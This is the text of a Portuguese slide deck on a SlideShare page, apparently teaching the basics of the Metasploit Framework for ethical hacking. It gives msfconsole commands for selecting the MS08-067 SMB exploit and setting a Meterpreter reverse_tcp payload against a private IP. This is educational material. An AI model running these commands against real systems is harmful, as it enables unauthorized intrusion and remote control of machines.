SlideShare uma empresa Scribd logo
1 de 12
Baixar para ler offline
Metasploit Framework
Marcos Flávio Araújo Assunção
Fundamentos de Ethical Hacking
Criado por HD Moore, é hoje o framework de
exploração de falhas mais utilizado.
■ Extremamente customizável;
■ Atualizações frequentes;
■ Possibilidade de criação de scripts;
■ Muitas opções de payloads;
■ Métodos para se burlar firewalls e
anti-vírus;
■ Meterpreter;
■ Interface console, gui (Armitage) e
web;
Metasploit
Suíte completa
O Metasploit Framework (MSF) vem com muitos utilitários para
auxiliar na realização da exploração. Vamos estudar os principais:
msfconsole e msfvenom.
Variáveis do Metasploit
São usadas em todos os comandos do MSF. Ex: msfconsole, msfcli,
msfpayload, etc. As principais são:
■ LHOST: IP local
■ LPORT: Porta local
■ RHOST: IP remoto
■ SRVHOST: IP do serviço
■ PAYLOAD: Tipo de payload
■ TARGET: Tipo de alvo
Msfconsole
Método mais utilizado para uso do MSF. É um console que
permite escolher interativamente exploits, utilitários, payloads e
configurar as devidas variáveis.
Comandos do MSFCONSOLE
■ search <nome>: Pesquisa módulo de exploit
■ use <nome>: Utiliza módulo de exploit
■ show <argumento>: Mostra informações referentes
ao módulo. O argumento pode ser: exploits,
options, payloads ou auxiliares.
■ set <variável>: Configura um valor em uma
variável.
Ex: LHOST, LPORT, PAYLOAD, etc.
■ unset <variável>: “Desconfigura” uma variável.
■ exploit: Realiza a exploração após as variáveis
terem sido configuradas.
Msfconsole
Exemplo search
search ms12
Msfconsole
Exemplo use
use exploit/windows/smb/ms08_06_netapi
Msfconsole
Exemplo show
show payloads
Msfconsole
Exemplo set
set LHOST 192.168.10.1
set LPORT 443
set RHOST 192.168.10.2
Msfconsole
set payload e
show options
set PAYLOAD
windows/meterpreter/reverse_tcp
show options
Msfconsole
Exploit
Depois de todas as variáveis já devidamente configuradas para
executar o comando exploit para realizar a exploração:

Mais conteúdo relacionado

Semelhante a Metasploit Framework: Uma Suíte Completa para Pentesting

ApresentaçãO2 Sistema Operacional
ApresentaçãO2  Sistema OperacionalApresentaçãO2  Sistema Operacional
ApresentaçãO2 Sistema OperacionalCláudia Costa
 
Sistemas Operacionais parte 1
Sistemas Operacionais parte 1Sistemas Operacionais parte 1
Sistemas Operacionais parte 1Matheus Brito
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespesluizfelipemz
 
181554969 protecao-seguranca
181554969 protecao-seguranca181554969 protecao-seguranca
181554969 protecao-segurancaMarco Guimarães
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasPotiLivre Sobrenome
 
Evolução dos sistemas operativos
Evolução dos sistemas operativosEvolução dos sistemas operativos
Evolução dos sistemas operativosLeo Simões
 
Introdução ao Linux - Aula 01
Introdução ao Linux - Aula 01Introdução ao Linux - Aula 01
Introdução ao Linux - Aula 01Ivaldo Cardoso
 
Casos De Sucesso De Software Livre Ap
Casos De Sucesso De Software Livre ApCasos De Sucesso De Software Livre Ap
Casos De Sucesso De Software Livre ApArthur
 
Invasaocom exploits
Invasaocom exploitsInvasaocom exploits
Invasaocom exploitsNauber Gois
 
O Que E Software Livre
O Que E Software LivreO Que E Software Livre
O Que E Software LivreFreedom DayMS
 
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDBVinicius de Sá
 
Software Livre Motor para o desenvolvimento sustentável
Software Livre Motor para o desenvolvimento sustentávelSoftware Livre Motor para o desenvolvimento sustentável
Software Livre Motor para o desenvolvimento sustentávelHumaneasy Consulting
 
Simulação de Sistemas Distribuídos utilizando o OMNet+
Simulação de Sistemas Distribuídos utilizando o OMNet+Simulação de Sistemas Distribuídos utilizando o OMNet+
Simulação de Sistemas Distribuídos utilizando o OMNet+Walter Coan
 

Semelhante a Metasploit Framework: Uma Suíte Completa para Pentesting (20)

ApresentaçãO2 Sistema Operacional
ApresentaçãO2  Sistema OperacionalApresentaçãO2  Sistema Operacional
ApresentaçãO2 Sistema Operacional
 
Sistemas Operacionais parte 1
Sistemas Operacionais parte 1Sistemas Operacionais parte 1
Sistemas Operacionais parte 1
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespes
 
Workshop
WorkshopWorkshop
Workshop
 
Introdução Linux
Introdução LinuxIntrodução Linux
Introdução Linux
 
181554969 protecao-seguranca
181554969 protecao-seguranca181554969 protecao-seguranca
181554969 protecao-seguranca
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
 
Evolução dos sistemas operativos
Evolução dos sistemas operativosEvolução dos sistemas operativos
Evolução dos sistemas operativos
 
Introdução ao Linux - Aula 01
Introdução ao Linux - Aula 01Introdução ao Linux - Aula 01
Introdução ao Linux - Aula 01
 
Casos De Sucesso De Software Livre Ap
Casos De Sucesso De Software Livre ApCasos De Sucesso De Software Livre Ap
Casos De Sucesso De Software Livre Ap
 
[Tutorial] metasploit
[Tutorial] metasploit[Tutorial] metasploit
[Tutorial] metasploit
 
Invasaocom exploits
Invasaocom exploitsInvasaocom exploits
Invasaocom exploits
 
O Que E Software Livre
O Que E Software LivreO Que E Software Livre
O Que E Software Livre
 
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB
[LatinoWare 2012] Mini Curso PHP 5.4 + MongoDB
 
Software Livre Motor para o desenvolvimento sustentável
Software Livre Motor para o desenvolvimento sustentávelSoftware Livre Motor para o desenvolvimento sustentável
Software Livre Motor para o desenvolvimento sustentável
 
Aula 1
Aula 1Aula 1
Aula 1
 
Sistema operacional-1-ano-de-informatica-completa
Sistema operacional-1-ano-de-informatica-completaSistema operacional-1-ano-de-informatica-completa
Sistema operacional-1-ano-de-informatica-completa
 
Aula de SO
Aula de SOAula de SO
Aula de SO
 
PHP Presente e Futuro
PHP Presente e FuturoPHP Presente e Futuro
PHP Presente e Futuro
 
Simulação de Sistemas Distribuídos utilizando o OMNet+
Simulação de Sistemas Distribuídos utilizando o OMNet+Simulação de Sistemas Distribuídos utilizando o OMNet+
Simulação de Sistemas Distribuídos utilizando o OMNet+
 

Metasploit Framework: Uma Suíte Completa para Pentesting